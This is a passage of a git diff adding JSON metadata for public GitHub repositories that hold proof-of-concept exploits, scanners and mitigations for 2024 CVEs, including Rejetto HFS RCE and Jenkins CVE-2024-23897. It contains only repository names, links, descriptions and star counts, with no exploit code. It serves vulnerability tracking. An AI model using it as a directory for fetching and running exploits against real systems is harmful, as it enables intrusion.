false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815792680, + "name": "CVE-2024-23692-exp", + "full_name": "Tupler\/CVE-2024-23692-exp", + "owner": { + "login": "Tupler", + "id": 42026413, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42026413?v=4", + "html_url": "https:\/\/github.com\/Tupler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tupler\/CVE-2024-23692-exp", + "description": "CVE-2024-23692 exp", + "fork": false, + "created_at": "2024-06-16T07:04:01Z", + "updated_at": "2024-06-16T07:05:17Z", + "pushed_at": "2024-06-16T07:05:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816201672, + "name": "CVE-2024-23692", + "full_name": "BBD-YZZ\/CVE-2024-23692", + "owner": { + "login": "BBD-YZZ", + "id": 132546612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4", + "html_url": "https:\/\/github.com\/BBD-YZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBD-YZZ\/CVE-2024-23692", + "description": "CVE-2024-23692", + "fork": false, + "created_at": "2024-06-17T08:46:48Z", + "updated_at": "2024-11-24T09:02:19Z", + "pushed_at": "2024-06-18T01:23:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816587020, + "name": "CVE-2024-23692-EXP", + "full_name": "0x20c\/CVE-2024-23692-EXP", + "owner": { + "login": "0x20c", + "id": 25526653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25526653?v=4", + "html_url": "https:\/\/github.com\/0x20c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x20c\/CVE-2024-23692-EXP", + "description": "CVE-2024-23692 Exploit", + "fork": false, + "created_at": "2024-06-18T03:27:47Z", + "updated_at": "2024-11-28T01:52:30Z", + "pushed_at": "2024-06-18T04:06:25Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826630505, + "name": "Rejetto-HFS-2.x-RCE-CVE-2024-23692", + "full_name": "pradeepboo\/Rejetto-HFS-2.x-RCE-CVE-2024-23692", + "owner": { + "login": "pradeepboo", + "id": 66199235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66199235?v=4", + "html_url": "https:\/\/github.com\/pradeepboo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pradeepboo\/Rejetto-HFS-2.x-RCE-CVE-2024-23692", + "description": "Rejetto HTTP File Server (HFS) 2.x - Unauthenticated RCE exploit module (CVE-2024-23692)", + "fork": false, + "created_at": "2024-07-10T04:44:27Z", + "updated_at": "2024-08-04T03:30:48Z", + "pushed_at": "2024-07-10T04:55:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 857714170, + "name": "CVE-2024-23692", + "full_name": "verylazytech\/CVE-2024-23692", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-23692", + "description": "POC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692 ", + "fork": false, + "created_at": "2024-09-15T12:15:35Z", + "updated_at": "2024-11-28T18:12:33Z", + "pushed_at": "2024-11-26T14:45:12Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-23692", + "rce-exploit", + "rejetto-http-file-server", + "unauthenticated-rce" + ], + "visibility": "public", + "forks": 15, + "watchers": 34, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892922028, + "name": "cve-2024-23692-poc", + "full_name": "XiaomingX\/cve-2024-23692-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-23692-poc", + "description": "CVE-2024-23692 是影响 Rejetto HTTP File Server(HFS)2.3m 及之前版本的模板注入漏洞。该漏洞允许远程未授权的攻击者通过发送特制的 HTTP 请求,在受影响的系统上执行任意命令。", + "fork": false, + "created_at": "2024-11-23T03:59:13Z", + "updated_at": "2024-11-26T03:21:42Z", + "pushed_at": "2024-11-23T04:00:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23708.json b/2024/CVE-2024-23708.json new file mode 100644 index 0000000000..0a46ca3797 --- /dev/null +++ b/2024/CVE-2024-23708.json @@ -0,0 +1,33 @@ +[ + { + "id": 839858072, + "name": "CVE-2024-23708", + "full_name": "uthrasri\/CVE-2024-23708", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2024-23708", + "description": null, + "fork": false, + "created_at": "2024-08-08T13:16:58Z", + "updated_at": "2024-08-08T13:28:22Z", + "pushed_at": "2024-08-08T13:28:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23709.json b/2024/CVE-2024-23709.json new file mode 100644 index 0000000000..844dacce68 --- /dev/null +++ b/2024/CVE-2024-23709.json @@ -0,0 +1,33 @@ +[ + { + "id": 841887434, + "name": "external_sonivox_CVE-2024-23709", + "full_name": "AbrarKhan\/external_sonivox_CVE-2024-23709", + "owner": { + "login": "AbrarKhan", + "id": 3054615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3054615?v=4", + "html_url": "https:\/\/github.com\/AbrarKhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbrarKhan\/external_sonivox_CVE-2024-23709", + "description": null, + "fork": false, + "created_at": "2024-08-13T08:44:25Z", + "updated_at": "2024-10-22T08:57:01Z", + "pushed_at": "2024-08-13T08:52:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23722.json b/2024/CVE-2024-23722.json new file mode 100644 index 0000000000..42003ec1bf --- /dev/null +++ b/2024/CVE-2024-23722.json @@ -0,0 +1,33 @@ +[ + { + "id": 777360363, + "name": "CVE-2024-23722-poc", + "full_name": "alexcote1\/CVE-2024-23722-poc", + "owner": { + "login": "alexcote1", + "id": 22797946, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22797946?v=4", + "html_url": "https:\/\/github.com\/alexcote1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alexcote1\/CVE-2024-23722-poc", + "description": null, + "fork": false, + "created_at": "2024-03-25T17:50:33Z", + "updated_at": "2024-03-26T13:12:34Z", + "pushed_at": "2024-05-08T19:33:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23727.json b/2024/CVE-2024-23727.json new file mode 100644 index 0000000000..e00c9e32f9 --- /dev/null +++ b/2024/CVE-2024-23727.json @@ -0,0 +1,36 @@ +[ + { + "id": 714795483, + "name": "yi", + "full_name": "actuator\/yi", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/yi", + "description": "CVE-2023-47882 | CVE-2024-23727", + "fork": false, + "created_at": "2023-11-05T20:37:24Z", + "updated_at": "2024-03-24T16:26:09Z", + "pushed_at": "2024-03-24T16:16:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-47882", + "cve-2024-23727" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23738.json b/2024/CVE-2024-23738.json new file mode 100644 index 0000000000..832dc3aa0c --- /dev/null +++ b/2024/CVE-2024-23738.json @@ -0,0 +1,33 @@ +[ + { + "id": 748194668, + "name": "CVE-2024-23738", + "full_name": "giovannipajeu1\/CVE-2024-23738", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23738", + "description": "CVE-2024-23738", + "fork": false, + "created_at": "2024-01-25T13:27:19Z", + "updated_at": "2024-01-28T09:51:00Z", + "pushed_at": "2024-01-25T13:32:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23739.json b/2024/CVE-2024-23739.json new file mode 100644 index 0000000000..0374e98090 --- /dev/null +++ b/2024/CVE-2024-23739.json @@ -0,0 +1,33 @@ +[ + { + "id": 748201476, + "name": "CVE-2024-23739", + "full_name": "giovannipajeu1\/CVE-2024-23739", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23739", + "description": "CVE-2024-23739", + "fork": false, + "created_at": "2024-01-25T13:44:16Z", + "updated_at": "2024-03-06T02:09:46Z", + "pushed_at": "2024-01-25T13:48:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23740.json b/2024/CVE-2024-23740.json new file mode 100644 index 0000000000..567dbd02a5 --- /dev/null +++ b/2024/CVE-2024-23740.json @@ -0,0 +1,33 @@ +[ + { + "id": 748198610, + "name": "CVE-2024-23740", + "full_name": "giovannipajeu1\/CVE-2024-23740", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23740", + "description": " CVE-2024-23739", + "fork": false, + "created_at": "2024-01-25T13:37:08Z", + "updated_at": "2024-01-25T13:43:33Z", + "pushed_at": "2024-01-25T13:43:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23741.json b/2024/CVE-2024-23741.json new file mode 100644 index 0000000000..5f9f44cf8f --- /dev/null +++ b/2024/CVE-2024-23741.json @@ -0,0 +1,33 @@ +[ + { + "id": 748203643, + "name": "CVE-2024-23741", + "full_name": "giovannipajeu1\/CVE-2024-23741", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23741", + "description": "CVE-2024-23741", + "fork": false, + "created_at": "2024-01-25T13:49:10Z", + "updated_at": "2024-01-25T13:49:10Z", + "pushed_at": "2024-01-25T13:51:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23742.json b/2024/CVE-2024-23742.json new file mode 100644 index 0000000000..445f34887a --- /dev/null +++ b/2024/CVE-2024-23742.json @@ -0,0 +1,33 @@ +[ + { + "id": 748204912, + "name": "CVE-2024-23742", + "full_name": "giovannipajeu1\/CVE-2024-23742", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23742", + "description": "CVE-2024-23742", + "fork": false, + "created_at": "2024-01-25T13:52:05Z", + "updated_at": "2024-01-26T05:58:50Z", + "pushed_at": "2024-01-25T13:55:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23743.json b/2024/CVE-2024-23743.json new file mode 100644 index 0000000000..dd552d0ff5 --- /dev/null +++ b/2024/CVE-2024-23743.json @@ -0,0 +1,33 @@ +[ + { + "id": 733590093, + "name": "CVE-2024-23743", + "full_name": "giovannipajeu1\/CVE-2024-23743", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23743", + "description": null, + "fork": false, + "created_at": "2023-12-19T17:07:27Z", + "updated_at": "2024-03-12T06:08:21Z", + "pushed_at": "2024-01-25T13:56:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23745.json b/2024/CVE-2024-23745.json new file mode 100644 index 0000000000..e03d1b40a6 --- /dev/null +++ b/2024/CVE-2024-23745.json @@ -0,0 +1,33 @@ +[ + { + "id": 748384236, + "name": "CVE-2024-23745", + "full_name": "louiselalanne\/CVE-2024-23745", + "owner": { + "login": "louiselalanne", + "id": 100588945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4", + "html_url": "https:\/\/github.com\/louiselalanne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2024-23745", + "description": "In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack.", + "fork": false, + "created_at": "2024-01-25T21:20:40Z", + "updated_at": "2024-03-12T08:48:47Z", + "pushed_at": "2024-01-25T22:15:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23746.json b/2024/CVE-2024-23746.json new file mode 100644 index 0000000000..322af3587c --- /dev/null +++ b/2024/CVE-2024-23746.json @@ -0,0 +1,33 @@ +[ + { + "id": 748435064, + "name": "CVE-2024-23746", + "full_name": "louiselalanne\/CVE-2024-23746", + "owner": { + "login": "louiselalanne", + "id": 100588945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4", + "html_url": "https:\/\/github.com\/louiselalanne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2024-23746", + "description": "Miro Desktop 0.8.18 on macOS allows Electron code injection.", + "fork": false, + "created_at": "2024-01-26T00:39:20Z", + "updated_at": "2024-07-30T16:17:02Z", + "pushed_at": "2024-01-26T14:00:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23747.json b/2024/CVE-2024-23747.json new file mode 100644 index 0000000000..87e2bafc91 --- /dev/null +++ b/2024/CVE-2024-23747.json @@ -0,0 +1,33 @@ +[ + { + "id": 748435966, + "name": "CVE-2024-23747", + "full_name": "louiselalanne\/CVE-2024-23747", + "owner": { + "login": "louiselalanne", + "id": 100588945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4", + "html_url": "https:\/\/github.com\/louiselalanne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2024-23747", + "description": "Moderna Sistemas ModernaNet Hospital Management System 2024 is susceptible to an Insecure Direct Object Reference (IDOR) vulnerability", + "fork": false, + "created_at": "2024-01-26T00:43:29Z", + "updated_at": "2024-01-26T00:43:30Z", + "pushed_at": "2024-01-26T09:32:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23772.json b/2024/CVE-2024-23772.json new file mode 100644 index 0000000000..cb9de88c86 --- /dev/null +++ b/2024/CVE-2024-23772.json @@ -0,0 +1,33 @@ +[ + { + "id": 753041144, + "name": "CVE-2024-23772", + "full_name": "Verrideo\/CVE-2024-23772", + "owner": { + "login": "Verrideo", + "id": 33281087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33281087?v=4", + "html_url": "https:\/\/github.com\/Verrideo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Verrideo\/CVE-2024-23772", + "description": null, + "fork": false, + "created_at": "2024-02-05T10:58:33Z", + "updated_at": "2024-02-05T10:58:33Z", + "pushed_at": "2024-02-05T11:04:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23773.json b/2024/CVE-2024-23773.json new file mode 100644 index 0000000000..a43d40c1ba --- /dev/null +++ b/2024/CVE-2024-23773.json @@ -0,0 +1,33 @@ +[ + { + "id": 753041259, + "name": "CVE-2024-23773", + "full_name": "Verrideo\/CVE-2024-23773", + "owner": { + "login": "Verrideo", + "id": 33281087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33281087?v=4", + "html_url": "https:\/\/github.com\/Verrideo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Verrideo\/CVE-2024-23773", + "description": null, + "fork": false, + "created_at": "2024-02-05T10:58:50Z", + "updated_at": "2024-02-05T10:58:51Z", + "pushed_at": "2024-02-05T11:03:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23774.json b/2024/CVE-2024-23774.json new file mode 100644 index 0000000000..db76a48011 --- /dev/null +++ b/2024/CVE-2024-23774.json @@ -0,0 +1,33 @@ +[ + { + "id": 753041345, + "name": "CVE-2024-23774", + "full_name": "Verrideo\/CVE-2024-23774", + "owner": { + "login": "Verrideo", + "id": 33281087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33281087?v=4", + "html_url": "https:\/\/github.com\/Verrideo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Verrideo\/CVE-2024-23774", + "description": null, + "fork": false, + "created_at": "2024-02-05T10:59:03Z", + "updated_at": "2024-02-05T10:59:03Z", + "pushed_at": "2024-02-05T11:02:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23780.json b/2024/CVE-2024-23780.json new file mode 100644 index 0000000000..28239d9f36 --- /dev/null +++ b/2024/CVE-2024-23780.json @@ -0,0 +1,33 @@ +[ + { + "id": 769096857, + "name": "CVE-2024-23780", + "full_name": "HazardLab-IO\/CVE-2024-23780", + "owner": { + "login": "HazardLab-IO", + "id": 162697088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/162697088?v=4", + "html_url": "https:\/\/github.com\/HazardLab-IO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HazardLab-IO\/CVE-2024-23780", + "description": "Netbox - CVE-2024-23780", + "fork": false, + "created_at": "2024-03-08T10:39:59Z", + "updated_at": "2024-03-08T10:48:18Z", + "pushed_at": "2024-03-08T10:49:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2389.json b/2024/CVE-2024-2389.json new file mode 100644 index 0000000000..dfb190a90d --- /dev/null +++ b/2024/CVE-2024-2389.json @@ -0,0 +1,33 @@ +[ + { + "id": 785250757, + "name": "CVE-2024-2389", + "full_name": "adhikara13\/CVE-2024-2389", + "owner": { + "login": "adhikara13", + "id": 44716348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44716348?v=4", + "html_url": "https:\/\/github.com\/adhikara13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adhikara13\/CVE-2024-2389", + "description": null, + "fork": false, + "created_at": "2024-04-11T14:03:23Z", + "updated_at": "2024-06-18T15:57:47Z", + "pushed_at": "2024-04-11T14:33:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23897.json b/2024/CVE-2024-23897.json new file mode 100644 index 0000000000..1ae7deaae0 --- /dev/null +++ b/2024/CVE-2024-23897.json @@ -0,0 +1,1039 @@ +[ + { + "id": 747359905, + "name": "SECURITY-3314-3315", + "full_name": "jenkinsci-cert\/SECURITY-3314-3315", + "owner": { + "login": "jenkinsci-cert", + "id": 9285726, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9285726?v=4", + "html_url": "https:\/\/github.com\/jenkinsci-cert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jenkinsci-cert\/SECURITY-3314-3315", + "description": "Workaround for disabling the CLI to mitigate SECURITY-3314\/CVE-2024-23897 and SECURITY-3315\/CVE-2024-23898", + "fork": false, + "created_at": "2024-01-23T19:19:04Z", + "updated_at": "2024-11-23T04:50:22Z", + "pushed_at": "2024-02-20T14:13:25Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 748543127, + "name": "CVE-2024-23897", + "full_name": "binganao\/CVE-2024-23897", + "owner": { + "login": "binganao", + "id": 70050083, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70050083?v=4", + "html_url": "https:\/\/github.com\/binganao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/binganao\/CVE-2024-23897", + "description": null, + "fork": false, + "created_at": "2024-01-26T08:02:00Z", + "updated_at": "2024-11-08T17:33:51Z", + "pushed_at": "2024-02-01T06:50:32Z", + "stargazers_count": 98, + "watchers_count": 98, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 98, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748577478, + "name": "CVE-2024-23897", + "full_name": "h4x0r-dz\/CVE-2024-23897", + "owner": { + "login": "h4x0r-dz", + "id": 26070859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26070859?v=4", + "html_url": "https:\/\/github.com\/h4x0r-dz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4x0r-dz\/CVE-2024-23897", + "description": "CVE-2024-23897", + "fork": false, + "created_at": "2024-01-26T09:44:32Z", + "updated_at": "2024-11-27T22:38:24Z", + "pushed_at": "2024-01-28T06:47:28Z", + "stargazers_count": 194, + "watchers_count": 194, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 194, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 748785405, + "name": "CVE-2024-23897", + "full_name": "xaitax\/CVE-2024-23897", + "owner": { + "login": "xaitax", + "id": 5014849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5014849?v=4", + "html_url": "https:\/\/github.com\/xaitax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xaitax\/CVE-2024-23897", + "description": "CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner. ", + "fork": false, + "created_at": "2024-01-26T19:00:03Z", + "updated_at": "2024-11-16T23:00:32Z", + "pushed_at": "2024-02-29T12:13:21Z", + "stargazers_count": 70, + "watchers_count": 70, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 70, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 748847022, + "name": "poc-cve-2024-23897", + "full_name": "vmtyan\/poc-cve-2024-23897", + "owner": { + "login": "vmtyan", + "id": 157635595, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/157635595?v=4", + "html_url": "https:\/\/github.com\/vmtyan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vmtyan\/poc-cve-2024-23897", + "description": null, + "fork": false, + "created_at": "2024-01-26T21:39:26Z", + "updated_at": "2024-10-05T09:45:00Z", + "pushed_at": "2024-01-26T21:46:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 748932948, + "name": "CVE-2024-23897", + "full_name": "yoryio\/CVE-2024-23897", + "owner": { + "login": "yoryio", + "id": 134471901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4", + "html_url": "https:\/\/github.com\/yoryio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoryio\/CVE-2024-23897", + "description": "Scanner for CVE-2024-23897 - Jenkins", + "fork": false, + "created_at": "2024-01-27T04:35:20Z", + "updated_at": "2024-02-09T17:37:28Z", + "pushed_at": "2024-03-13T05:52:30Z", + 